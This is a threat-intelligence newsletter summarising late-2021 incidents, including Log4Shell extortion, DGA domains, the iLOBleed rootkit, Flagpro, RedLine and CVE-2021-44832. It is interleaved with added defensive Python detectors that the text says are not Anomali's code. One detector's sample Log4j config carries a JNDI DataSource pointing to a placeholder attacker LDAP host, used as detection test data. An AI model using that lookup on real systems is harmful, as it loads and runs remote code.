
Anomali Cyber Watch: $5 Million Breach Extortion, APTs Using DGA Subdomains, Cyberespionage Group Incorporates A New Tool, and More

Anomali Threat Research
January 5, 2022
<p>The threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: <b>APT, Cyberespionage, Data breach, DGA, Infostealer, Phishing, Rootkit,</b> and <b>Vulnerabilities</b>. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.</p> <p><img src="https://cdn.filestackcontent.com/t0XX64DmTCWUfWzSBaUa"/><br/> <em>Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.</em></p> <h2>Trending Cyber News and Threat Intelligence</h2> <div class="trending-threat-article" id="trending-threats"> <h3 id="article-1"><a href="https://www.bleepingcomputer.com/news/security/fintech-firm-hit-by-log4j-hack-refuses-to-pay-5-million-ransom/" target="_blank">Fintech Firm Hit by Log4j Hack Refuses to Pay $5 Million Ransom</a></h3> <p>(published: December 29, 2021)</p> <p>The Vietnamese cryptocurrency trading platform ONUS was breached by unknown threat actor(s) who exploited the Log4Shell (CVE-2021-44228) vulnerability between December 11 and 13, 2021. The exploited target was an AWS server running Cyclos point-of-sale software that was intended only for sandbox use. From that foothold the actors reached misconfigured AWS S3 buckets holding information on approximately two million customers, stole the data, and then attempted to extort five million dollars (USD).<br/> <b>Analyst Comment:</b> Although Cyclos issued a warning to patch on December 13, the threat actors had already gained illicit access.
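The second half of this incident, a bucket that was reachable once the attackers were inside, is the kind of misconfiguration an offline policy check catches before an attacker does. The block below is an added example, not ONUS, Cyclos or Anomali code: it audits one bucket's Public Access Block flags, ACL grants and bucket policy on constructed inputs shaped like the AWS API responses. The bucket name, account ID and role ARN in the samples are made up.

```python
"""Offline audit of one S3 bucket's exposure settings.

Added example; not ONUS, Cyclos or Anomali code. The inputs are constructed
to match the JSON shapes returned by the AWS S3 API calls GetBucketPolicy,
GetBucketAcl and GetPublicAccessBlock, so the logic runs without credentials.
"""
import json

# Grantee URIs that AWS uses for "anyone" and "any AWS account" in ACLs.
PUBLIC_ACL_GRANTEES = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}
PAB_FLAGS = ("BlockPublicAcls", "IgnorePublicAcls",
             "BlockPublicPolicy", "RestrictPublicBuckets")


def _as_list(value):
    """Policy documents allow a string or a list in Principal.AWS and Action."""
    return [value] if isinstance(value, str) else list(value or [])


def principal_is_public(principal):
    """True if a statement's Principal grants access to everyone."""
    if principal == "*":
        return True
    return isinstance(principal, dict) and "*" in _as_list(principal.get("AWS"))


def audit_bucket(name, policy_json, acl_grants, public_access_block):
    """Return a list of (severity, message) findings for one bucket.

    policy_json: bucket policy as a JSON string, or None if there is none.
    acl_grants: the "Grants" list from GetBucketAcl.
    public_access_block: the four BlockPublic* flags; {} if never configured.
    """
    findings = []

    # 1. Guard rails: with all four flags on, public ACLs and policies are
    #    rejected or ignored even if the checks below would otherwise fail.
    off = [k for k in PAB_FLAGS if not public_access_block.get(k, False)]
    if off:
        findings.append(("medium", f"{name}: Public Access Block not fully enabled (off: {', '.join(off)})"))

    # 2. ACL grants to the anonymous / any-authenticated-account groups.
    for grant in acl_grants:
        uri = grant.get("Grantee", {}).get("URI")
        if uri in PUBLIC_ACL_GRANTEES:
            findings.append(("high", f"{name}: ACL grants {grant.get('Permission')} to {uri.rsplit('/', 1)[-1]}"))

    # 3. Policy statements that Allow a public principal. A Condition block
    #    (e.g. aws:SourceVpc) may narrow '*', so those are flagged for review.
    if policy_json:
        stmts = json.loads(policy_json).get("Statement", [])
        for stmt in ([stmts] if isinstance(stmts, dict) else stmts):
            if stmt.get("Effect") != "Allow" or not principal_is_public(stmt.get("Principal")):
                continue
            actions = ", ".join(_as_list(stmt.get("Action")))
            if stmt.get("Condition"):
                findings.append(("medium", f"{name}: policy allows {actions} to '*' scoped by a Condition; review it"))
            else:
                findings.append(("critical", f"{name}: policy allows {actions} to Principal '*'"))
    return findings


# Constructed sample inputs (bucket name, account ID and role are made up).
WEAK_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
                   "Action": ["s3:GetObject", "s3:ListBucket"],
                   "Resource": ["arn:aws:s3:::customer-exports",
                                "arn:aws:s3:::customer-exports/*"]}],
})
WEAK_ACL = [{"Grantee": {"Type": "Group",
                         "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
             "Permission": "READ"}]
WEAK_PAB = {}  # never configured

HARDENED_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{"Sid": "AppRoleOnly", "Effect": "Allow",
                   "Principal": {"AWS": "arn:aws:iam::123456789012:role/app-backend"},
                   "Action": "s3:GetObject",
                   "Resource": "arn:aws:s3:::customer-exports/*"}],
})
HARDENED_ACL = [{"Grantee": {"Type": "CanonicalUser", "ID": "owner-canonical-id"},
                 "Permission": "FULL_CONTROL"}]
HARDENED_PAB = {flag: True for flag in PAB_FLAGS}


def run_demo():
    """Audit the weak and the hardened variant of the same bucket."""
    weak = audit_bucket("customer-exports", WEAK_POLICY, WEAK_ACL, WEAK_PAB)
    hardened = audit_bucket("customer-exports", HARDENED_POLICY, HARDENED_ACL, HARDENED_PAB)
    return weak, hardened


if __name__ == "__main__":
    weak, hardened = run_demo()
    for severity, message in weak:
        print(f"[{severity}] {message}")
    print(f"hardened bucket findings: {len(hardened)}")
```

On the weak variant the three checks fire in order (guard rails off, AllUsers READ grant, wildcard-principal Allow); the hardened variant, which scopes access to one IAM role and turns on all four Public Access Block flags, produces no findings. To run this against live buckets, feed the output of the three named API calls into audit_bucket per bucket.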
Even though Log4Shell provided initial access to the compromised server, it was the misconfigured buckets that the actors took advantage of to steal data.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947244" target="_blank">[MITRE ATT&amp;CK] Exploitation for Client Execution - T1203</a><br/> <b>Tags:</b> ONUS, Log4Shell, CVE-2021-44228</p> </div> <div class="trending-threat-article" id="trending-threats"> <h3 id="article-1"><a href="https://unit42.paloaltonetworks.com/strategically-aged-domain-detection/" target="_blank">Strategically Aged Domain Detection: Capture APT Attacks With DNS Traffic Trends</a></h3> <p>(published: December 29, 2021)</p> <p>Palo Alto Networks Unit 42 researchers have published a report based on their tracking of strategically aged malicious domains (registered, then left dormant until the moment an operation needs them) and of subdomains created under them with domain generation algorithms (DGAs). The researchers found two Pegasus spyware command-and-control domains that were registered in 2019 but did not become active until July 2021. They also identified a phishing campaign using DGA-generated subdomains similar to those used during the SolarWinds supply chain attack.<br/> <b>Analyst Comment:</b> Monitor your networks for abnormal DNS requests and, where possible, rate-limit DNS traffic to prevent large numbers of connections to DGA domains. Knowing which DGAs are most active in the wild lets you build a proactive defense by detecting any DGA that is in use.
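A minimal version of the two signals above, run over constructed DNS resolver logs, as an added example that is not Unit 42's or Anomali's code: many distinct, high-entropy labels under one registrable domain flag DGA-generated subdomains, and a domain whose registration date (here a constructed table standing in for WHOIS/RDAP lookups) is far older than its first appearance in your own logs flags strategic aging. The log lines, domain names, dates and thresholds are all made up, and the registrable-domain split assumes two labels where real code would use the Public Suffix List.

```python
"""Flag DGA-style subdomain churn and strategically aged domains in DNS logs.

Added example for the Unit 42 story; not Unit 42's or Anomali's code. The
resolver log lines, the registration-date table (a stand-in for WHOIS/RDAP
lookups) and the thresholds are all constructed for illustration. Real code
would split registrable domains with the Public Suffix List.
"""
import math
from collections import Counter, defaultdict
from datetime import date

# Constructed resolver log: "<date> <client> <queried name>"
DNS_LOG = """\
2021-07-12 10.0.0.5 www.example-corp.test
2021-07-12 10.0.0.5 mail.example-corp.test
2021-07-12 10.0.0.7 k3j9x2qv8w.updates-cdn.test
2021-07-12 10.0.0.7 p0m4zt7hbq.updates-cdn.test
2021-07-12 10.0.0.7 x8c1lq5nrw.updates-cdn.test
2021-07-12 10.0.0.7 d2v6yh0ksa.updates-cdn.test
2021-07-12 10.0.0.7 q9r3wn1uez.updates-cdn.test
2021-07-12 10.0.0.9 api.old-parked.test
2021-07-13 10.0.0.9 api.old-parked.test
"""
# Constructed registration dates (WHOIS/RDAP stand-in).
REGISTERED = {
    "example-corp.test": date(2012, 3, 1),
    "updates-cdn.test": date(2021, 7, 1),
    "old-parked.test": date(2019, 2, 14),
}
# Domains already present in earlier log history; anything else is new to us.
KNOWN_DOMAINS = {"example-corp.test"}


def shannon_entropy(label):
    """Bits per character of one DNS label; random labels score near log2(#chars)."""
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in Counter(label).values()) if n else 0.0


def split_name(qname):
    """(registrable domain, subdomain part); assumes a two-label registrable domain."""
    labels = qname.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]), ".".join(labels[:-2])


def parse_log(text):
    """Yield (date, client, qname) from the constructed log format."""
    for line in text.splitlines():
        if line.strip():
            d, client, qname = line.split()
            yield date.fromisoformat(d), client, qname


def detect_dga_subdomains(log_text, min_unique=5, min_entropy=3.0):
    """Domains with at least min_unique distinct high-entropy subdomains."""
    subs = defaultdict(set)
    for _, _, qname in parse_log(log_text):
        domain, sub = split_name(qname)
        if sub:
            subs[domain].add(sub)
    return {d: sorted(s for s in names if shannon_entropy(s) >= min_entropy)
            for d, names in subs.items()
            if sum(shannon_entropy(s) >= min_entropy for s in names) >= min_unique}


def detect_aged_domains(log_text, registered, known, min_age_days=365):
    """Domains first queried in this window but registered min_age_days+ earlier."""
    first_query = {}
    for day, _, qname in parse_log(log_text):
        domain, _ = split_name(qname)
        first_query[domain] = min(day, first_query.get(domain, day))
    return {d: (seen - registered[d]).days
            for d, seen in first_query.items()
            if d in registered and d not in known
            and (seen - registered[d]).days >= min_age_days}


def run_demo():
    """Both detectors over the constructed log; returns (dga, aged)."""
    return detect_dga_subdomains(DNS_LOG), detect_aged_domains(DNS_LOG, REGISTERED, KNOWN_DOMAINS)


if __name__ == "__main__":
    dga, aged = run_demo()
    for d, names in dga.items():
        print(f"DGA-like subdomain churn under {d}: {len(names)} labels, e.g. {names[:2]}")
    for d, age in aged.items():
        print(f"strategically aged: {d} registered {age} days before its first query here")
```

The entropy threshold of 3.0 bits per character separates the ten-character random labels (log2(10), about 3.32) from dictionary-like names such as mail or api; on real traffic, tune min_unique per domain and per time window, and exclude CDN and cloud-provider domains whose legitimate hostnames are also random-looking.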
Anomali can detect DGAs used by malware, which assists in defending against these types of threats.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/3905073" target="_blank">[MITRE ATT&amp;CK] Dynamic Resolution - T1568</a> | <a href="https://ui.threatstream.com/ttp/3905074" target="_blank">[MITRE ATT&amp;CK] Phishing - T1566</a> | <a href="https://ui.threatstream.com/ttp/3905071" target="_blank">[MITRE ATT&amp;CK] Application Layer Protocol - T1071</a><br/> <b>Tags:</b> DGA, Pegasus, Phishing</p> </div> <div class="trending-threat-article" id="trending-threats"> <h3 id="article-1"><a href="https://threats.amnpardaz.com/en/2021/12/28/implant-arm-ilobleed-a/" target="_blank">Implant.ARM.iLOBleed.a</a></h3> <p>(published: December 28, 2021)</p> <p>Amnpardaz researchers discovered a rootkit that has been targeting Hewlett Packard Enterprise’s Integrated Lights-Out (iLO) server management technology since 2020. The rootkit, dubbed iLOBleed, is the first reported iLO malware. Because it controls the iLO modules, iLOBleed has access to nearly everything on an infected HPE server, including the firmware, the hardware, and the operating system. It can also manipulate the firmware upgrade process to keep the iLO firmware at a vulnerable version while displaying fake update progress.<br/> <b>Analyst Comment:</b> iLOBleed has the potential for many different malicious actions on HPE servers because iLO is always active; however, the researchers did not identify the infection method.
Network segmentation is important to prevent easy lateral movement, and ensure policies are in place to monitor and update iLO firmware versions according to your company’s needs.<br/> <b>Tags:</b> Malware, Rootkit, iLOBleed</p> </div> <div class="trending-threat-article" id="trending-threats"> <h3 id="article-1"><a href="https://insight-jp.nttsecurity.com/post/102hf3q/flagpro-the-new-malware-used-by-blacktech" target="_blank">Flagpro: The New Malware Used by BlackTech</a></h3> <p>(published: December 28, 2021)</p> <p>The China-based cyberespionage group BlackTech (also tracked as Circuit Panda, Palmerworm, TEMP.Overboard, and WaterBear) has been observed actively targeting English-speaking countries, Japan, and Taiwan, according to NTT Security researchers. BlackTech was observed using a new malware, dubbed Flagpro, that is distributed through spearphishing emails as a password-protected .zip or .rar archive. The tailored email contains the archive password, and the archive holds an .xlsm file with a malicious macro. If the macro is enabled, it drops an executable, in some cases named dwm.exe, into the Startup directory; this executable is version one or two of Flagpro. Flagpro communicates with its command-and-control server over HTTP to receive commands and download additional payloads.<br/> <b>Analyst Comment:</b> BlackTech is a sophisticated group that, like other advanced groups, actively uses spearphishing emails as an initial infection vector. Emails requesting that an attachment be opened, particularly a password-protected one, should be viewed with extreme caution.
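The persistence step described above (an executable dropped into the Startup folder under a name borrowed from a Windows system binary) can be hunted for with a simple listing check. The block below is an added example, not NTT Security's or Anomali's code: it classifies Startup-folder entries, treating a system-binary name such as dwm.exe outside its real home directory as the strongest signal and any other directly executable file type as a weaker one. The sample listing is constructed; the only Flagpro-specific fact it relies on is the dwm.exe name the report gives. On a Windows host, scan_startup_folders() walks the real per-user and all-users folders.

```python
"""Hunt for Flagpro-style persistence: executables dropped into Windows Startup folders.

Added example for the BlackTech/Flagpro story; not NTT Security's or Anomali's
code. The sample listing is constructed. On a Windows host, call
scan_startup_folders() with no argument to walk the per-user and all-users
Startup folders; elsewhere it simply finds no such directories.
"""
import os
from pathlib import PureWindowsPath

# Extensions Windows runs directly when it processes the Startup folder.
EXECUTABLE_EXTS = {".exe", ".dll", ".scr", ".com", ".bat", ".cmd",
                   ".vbs", ".js", ".ps1", ".hta"}

# Legitimate Windows binary names that malware borrows for camouflage (the
# report names dwm.exe), mapped to the only directory the real one lives in.
SYSTEM_BINARY_HOMES = {
    "dwm.exe": r"C:\Windows\System32",
    "svchost.exe": r"C:\Windows\System32",
    "explorer.exe": r"C:\Windows",
}


def startup_folders():
    """Per-user and all-users Startup folders, from the environment Windows sets."""
    appdata = os.environ.get("APPDATA", r"C:\Users\Default\AppData\Roaming")
    programdata = os.environ.get("ProgramData", r"C:\ProgramData")
    tail = r"Microsoft\Windows\Start Menu\Programs\Startup"
    return [f"{appdata}\\{tail}", f"{programdata}\\{tail}"]


def classify(path):
    """Finding text for one Startup entry, or None if it looks benign."""
    p = PureWindowsPath(path)
    name, ext = p.name.lower(), p.suffix.lower()
    if ext == ".lnk":
        return None  # shortcuts are normal here; resolve and check their targets separately
    home = SYSTEM_BINARY_HOMES.get(name)
    if home and str(p.parent).lower() != home.lower():
        return f"system-binary name outside its home directory: {path}"
    if ext in EXECUTABLE_EXTS:
        return f"executable in Startup folder: {path}"
    return None


def scan_entries(entries):
    """Classify a list of Startup entries and return the non-benign findings."""
    return [finding for finding in map(classify, entries) if finding]


def scan_startup_folders(folders=None):
    """Walk real Startup folders (Windows only) and classify their contents."""
    findings = []
    for folder in (folders if folders is not None else startup_folders()):
        if os.path.isdir(folder):
            findings.extend(scan_entries(os.path.join(folder, e) for e in os.listdir(folder)))
    return findings


# Constructed listing of a user's Startup folder after the macro ran.
STARTUP = r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
SAMPLE_ENTRIES = [
    f"{STARTUP}\\desktop.ini",
    f"{STARTUP}\\OneNote.lnk",
    f"{STARTUP}\\dwm.exe",   # the drop described in the report
    f"{STARTUP}\\sync.vbs",
]

if __name__ == "__main__":
    for finding in scan_entries(SAMPLE_ENTRIES) + scan_startup_folders():
        print(finding)
```

Shortcuts (.lnk) are deliberately not flagged, because the folder normally contains them; a fuller hunt resolves each shortcut's target and classifies that instead, and pairs the listing with file hashes so a renamed known-good binary and a renamed implant can be told apart.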
Employ information-sharing policies in your company that reduce reliance on email attachments in favor of managed document-sharing tools for storing and sharing data.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947259" target="_blank">[MITRE ATT&amp;CK] Data Encoding - T1132</a> | <a href="https://ui.threatstream.com/ttp/3905074" target="_blank">[MITRE ATT&amp;CK] Phishing - T1566</a> | <a href="https://ui.threatstream.com/ttp/3904544" target="_blank">[MITRE ATT&amp;CK] Lateral Tool Transfer - T1570</a> | <a href="https://ui.threatstream.com/ttp/3905768" target="_blank">[MITRE ATT&amp;CK] Boot or Logon Autostart Execution - T1547</a><br/> <b>Tags:</b> BlackTech, Cyberespionage, Flagpro</p> </div> <div class="trending-threat-article" id="trending-threats"> <h3 id="article-1"><a href="https://www.bleepingcomputer.com/news/security/redline-malware-shows-why-passwords-shouldnt-be-saved-in-browsers/" target="_blank">RedLine malware shows why passwords shouldn't be saved in browsers</a></h3> <p>(published: December 28, 2021)</p> <p>An unauthorized corporate VPN login was traced back to a RedLine Stealer infection that had stolen credentials saved in a web browser, according to AhnLab ASEC researchers. RedLine is a well-known information-stealing malware capable of collecting many kinds of sensitive and system information. In this instance, the employee had saved corporate credentials in a Chromium-based web browser (Chrome, Edge, Opera, or Whale), from which RedLine Stealer harvested them.<br/> <b>Analyst Comment:</b> Avoid saving passwords in web browsers (Chrome offers to save them by default), because many malware families can extract information from browser password stores.
Instead, use a dedicated password manager such as Bitwarden, LastPass, or 1Password, among others.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/3905036" target="_blank">[MITRE ATT&amp;CK] Credentials from Password Stores - T1555</a><br/> <b>Tags:</b> RedLine Stealer, Password theft, Web browsers</p> </div> <div class="trending-threat-article" id="trending-threats"> <h3 id="article-1"><a href="https://checkmarx.com/blog/cve-2021-44832-apache-log4j-2-17-0-arbitrary-code-execution-via-jdbcappender-datasource-element/" target="_blank">CVE-2021-44832 – Apache Log4j 2.17.0 Arbitrary Code Execution Via JDBCAppender DataSource Element</a></h3> <p>(published: December 28, 2021)</p> <p>Another vulnerability affecting the popular Java logging package Log4j, registered as CVE-2021-44832, has been identified by Checkmarx researchers. To exploit it, a threat actor must first have the access and permissions needed to modify the Log4j configuration file. By crafting a malicious configuration that uses the JDBC Appender, which sends log events to a database, the actor can add a DataSource element whose JNDI name points to a remote location, causing the code retrieved from there to be executed.<br/> <b>Analyst Comment:</b> Apache’s Log4j security advisory offers the following mitigations: upgrade to Log4j 2.3.2 (for Java 6), 2.12.4 (for Java 7), or 2.17.1 (for Java 8 and later). In prior releases, confirm that if the JDBC Appender is being used, it is not configured to use any protocol other than Java. Note that only the log4j-core JAR file is affected by this vulnerability; applications using only the log4j-api JAR file without log4j-core are not affected. Also note that Apache Log4j is the only Logging Services subproject affected by this vulnerability.
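To turn the mitigation list above into a check, the following added example (not Checkmarx's or Apache's code) decides whether a log4j-core version falls on one of the fixed releases the advisory names and scans a log4j2 XML configuration for a JDBC appender DataSource whose jndiName uses any scheme other than java:. Both configuration documents are constructed; the ldap://attacker.example host is a placeholder, not an indicator from the page.

```python
"""Check a Log4j 2 deployment for CVE-2021-44832 exposure.

Added example for the CVE-2021-44832 story; not Checkmarx's or Apache's code.
(1) is_fixed() tells whether a log4j-core version is on a fixed release, using
the version lines named in the Apache advisory; (2) find_unsafe_datasources()
scans a log4j2 XML configuration for a JDBC appender whose DataSource jndiName
uses any scheme other than java:. Both configuration documents below are
constructed; the ldap:// host is a placeholder, not a real indicator.
"""
import xml.etree.ElementTree as ET

# First fixed release per maintenance line: 2.3.x (Java 6), 2.12.x (Java 7),
# and everything else on 2.x (Java 8 and later).
FIXED_BY_LINE = {(2, 3): (2, 3, 2), (2, 12): (2, 12, 4)}
FIXED_MAIN = (2, 17, 1)


def parse_version(text):
    """'2.17' -> (2, 17, 0); drops a '-rc1' style qualifier if present."""
    parts = [int(x) for x in text.strip().split("-")[0].split(".")]
    return tuple(parts + [0] * (3 - len(parts)))


def is_fixed(version):
    """True if this log4j-core version contains the CVE-2021-44832 fix."""
    v = parse_version(version)
    if v[0] != 2:
        raise ValueError("only Log4j 2.x is covered by the advisory")
    return v >= FIXED_BY_LINE.get(v[:2], FIXED_MAIN)


def _is_jdbc_appender(el):
    """Log4j accepts <JDBC .../> and <Appender type="JDBC" .../> for the same thing."""
    tag = el.tag.lower()
    return tag == "jdbc" or (tag == "appender" and el.get("type", "").lower() == "jdbc")


def find_unsafe_datasources(config_xml):
    """jndiName values of JDBC-appender DataSource elements that do not use java:."""
    unsafe = []
    for appender in ET.fromstring(config_xml).iter():
        if not _is_jdbc_appender(appender):
            continue
        for el in appender.iter():
            if el.tag.lower() == "datasource":
                jndi = el.get("jndiName", "")
                if not jndi.lower().startswith("java:"):
                    unsafe.append(jndi)
    return unsafe


def assess(log4j_core_version, config_xml):
    """Combine both checks: (verdict, offending jndiName values)."""
    unsafe = find_unsafe_datasources(config_xml)
    if is_fixed(log4j_core_version):
        return "patched", unsafe  # still worth cleaning the config up
    return ("exploitable-config" if unsafe else "unpatched-safe-config"), unsafe


# Constructed configurations. The JDBC appender, DataSource element and
# jndiName attribute are real Log4j 2 configuration syntax.
VULNERABLE_CONFIG = """\
<Configuration status="WARN">
  <Appenders>
    <JDBC name="dbLog" tableName="app_logs">
      <DataSource jndiName="ldap://attacker.example:1389/Exploit"/>
      <Column name="message" pattern="%m"/>
    </JDBC>
  </Appenders>
  <Loggers><Root level="info"><AppenderRef ref="dbLog"/></Root></Loggers>
</Configuration>
"""
HARDENED_CONFIG = VULNERABLE_CONFIG.replace(
    "ldap://attacker.example:1389/Exploit", "java:comp/env/jdbc/LoggingDataSource")

if __name__ == "__main__":
    for version, cfg in (("2.17.0", VULNERABLE_CONFIG), ("2.17.1", VULNERABLE_CONFIG),
                         ("2.17.0", HARDENED_CONFIG)):
        print(version, *assess(version, cfg))
```

In the fixed releases the JDBC appender only resolves a JNDI DataSource when the system property log4j2.enableJndiJdbc is set to true, so a "patched" verdict with a non-empty list still means the configuration should be cleaned up rather than relied on. The scan reads only the XML form of the configuration; JSON, YAML and properties configurations need the same jndiName check in their own syntax.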
Other projects, such as Log4net and Log4cxx, are not affected.<br/> <b>Tags:</b> Log4j, Vulnerability, CVE-2021-44832</p> </div> <div class="trending-threat-article" id="trending-threats"> <h3 id="article-1"><a href="https://thehackernews.com/2021/12/new-android-malware-targeting-brazils_27.html" target="_blank">New Android Malware Targeting Brazil’s Itaú Unibanco Bank Customers</a></h3> <p>(published: December 27, 2021)</p> <p>Cyble researchers analyzed a malware sample shared by MalwareHunterTeam on Twitter and found that it was a fake app impersonating the Brazilian financial services company Itaú Unibanco. The unknown threat actor(s) behind it created a fake Google Play Store page to host an app called _lTAU_SINC/sincronizador. If installed, the malware attempts to make fraudulent financial transactions through the legitimate Itaú Unibanco app.<br/> <b>Analyst Comment:</b> Android users should obtain software only from the official Google Play Store and avoid installing software from unverified sources, because malicious applications get into third-party stores more easily; in this case the actors imitated the Play Store on a page of their own, so verify the site’s address before installing anything. Applications that ask for permissions beyond their normal functionality should be treated with suspicion, and the normal functionality of an application should be reviewed carefully prior to installation. Antivirus applications, if available, should be deployed on devices, particularly those that could contain sensitive information. Furthermore, always ensure that you are downloading the correct application by visiting the official provider’s website.<br/> <b>Tags:</b> Fake app, Android, Malware, Itaú Unibanco</p> </div>
Anomali Threat Research

Anomali's Threat Research team continually tracks security threats to identify when new, highly critical security threats emerge. The Anomali Threat Research team's briefings discuss current threats and risks like botnets, data breaches, misconfigurations, ransomware, threat groups, and various vulnerabilities. The team also creates free and premium threat intelligence feeds for Anomali's industry-leading Threat Intelligence Platform, ThreatStream.


